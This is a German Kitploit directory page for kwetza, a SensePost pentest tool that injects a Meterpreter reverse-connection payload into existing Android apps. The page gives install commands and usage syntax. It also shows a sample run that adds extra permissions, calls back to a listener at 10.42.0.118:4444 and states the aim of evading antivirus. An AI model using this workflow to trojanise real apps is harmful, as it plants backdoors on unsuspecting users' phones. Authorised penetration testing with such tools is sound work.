Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
kwetza — Python-Skript zum Injizieren eines Meterpreter-Payloads in bestehende Android-Anwendungen. | Kitploit
Tools/GitHubGitHub/sensepost/kwetza
Android-SicherheitPayload-GenerierungExploitationMobile App-PenetrationstestsPenetrationstestsPayload-Entwicklung
GitHubsensepost/kwetza

kwetza

Python-Skript zum Injizieren eines Meterpreter-Payloads in bestehende Android-Anwendungen.

Repository anzeigen
64423923vor 8 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Einführung

Arsenal

Von Chris Le Roy (@brompwnie) [email protected]

Kwetza ist ein Werkzeug, mit dem Sie eine bestehende Android-Anwendung mit einem Meterpreter-Payload infizieren können.

Was macht es?

Kwetza infiziert eine bestehende Android-Anwendung entweder mit benutzerdefinierten oder Standard-Payload-Vorlagen, um eine Erkennung durch Antivirensoftware zu vermeiden. Kwetza ermöglicht es Ihnen, Android-Anwendungen mit den Standardberechtigungen der Zielanwendung zu infizieren oder zusätzliche Berechtigungen zu injizieren, um zusätzliche Funktionalität zu erhalten.

Wo finde ich den Blogbeitrag?

Die von Kwetza automatisierten manuellen Schritte finden Sie hier: https://sensepost.com/blog/2016/kwetza-infecting-android-applications/

Den Code erhalten

Zuerst den Code holen:

root@kitploit:~
git clone https://github.com/sensepost/kwetza.git

Kwetza ist in Python geschrieben und benötigt BeautifulSoup, das mit Pip installiert werden kann:

root@kitploit:~
pip install beautifulsoup4

Kwetza erfordert, dass Apktool installiert und über Ihren PATH zugänglich ist. Dies kann mit den Installationsanweisungen eingerichtet werden, die sich hier befinden: https://ibotpeaches.github.io/Apktool/install

Verwendung

python kwetza.py nameOfTheApkToInfect.apk https/tcp LHOST LPORT yes/no customClass

  • nameOfTheApkToInfect.apk = Name der APK, die Sie infizieren möchten.
  • https/tcp = Wählen Sie entweder eine HTTPS- oder TCP-Verbindung
  • LHOST = IP Ihres Listeners.
  • LPORT = Port Ihres Listeners.
  • yes = Fügen Sie "yes" ein, um zusätzliche böswillige Berechtigungen in die App zu injizieren, "no", um die Standardberechtigungen der App zu verwenden.
  • customClass = Geben Sie hier eine benutzerdefinierte Aktivität an, wenn Sie möchten, dass Kwetza in diese Aktivität injiziert.
root@kitploit:~
python kwetza.py hackme.apk https 10.42.0.118 4444 yes com.moo.another.activity
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Informationen

Kwetza wurde für die Arbeit mit Python 2 entwickelt.

Standardmäßig verwendet Kwetza die Vorlage und den Keystore im Ordner "payload", um die infizierte APK zu injizieren und zu signieren.

Wenn Sie die infizierte Anwendung mit Ihrem eigenen Zertifikat signieren möchten, generieren Sie einen neuen Keystore und legen Sie ihn im Ordner "payload" ab und benennen Sie ihn in den vorhandenen Keystore um oder ändern Sie den Verweis in der kwetza.py.

Das gleiche kann für Payload-Vorlagen gemacht werden.

Das Passwort für den Standard-Keystore ist, na ja, "password".

Lizenz

Kwetza ist lizenziert unter einer Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (http://creativecommons.org/licenses/by-nc-sa/4.0).

Berechtigungen, die über den Rahmen dieser Lizenz hinausgehen, sind möglicherweise unter http://sensepost.com/contact erhältlich.

Tool herunterladen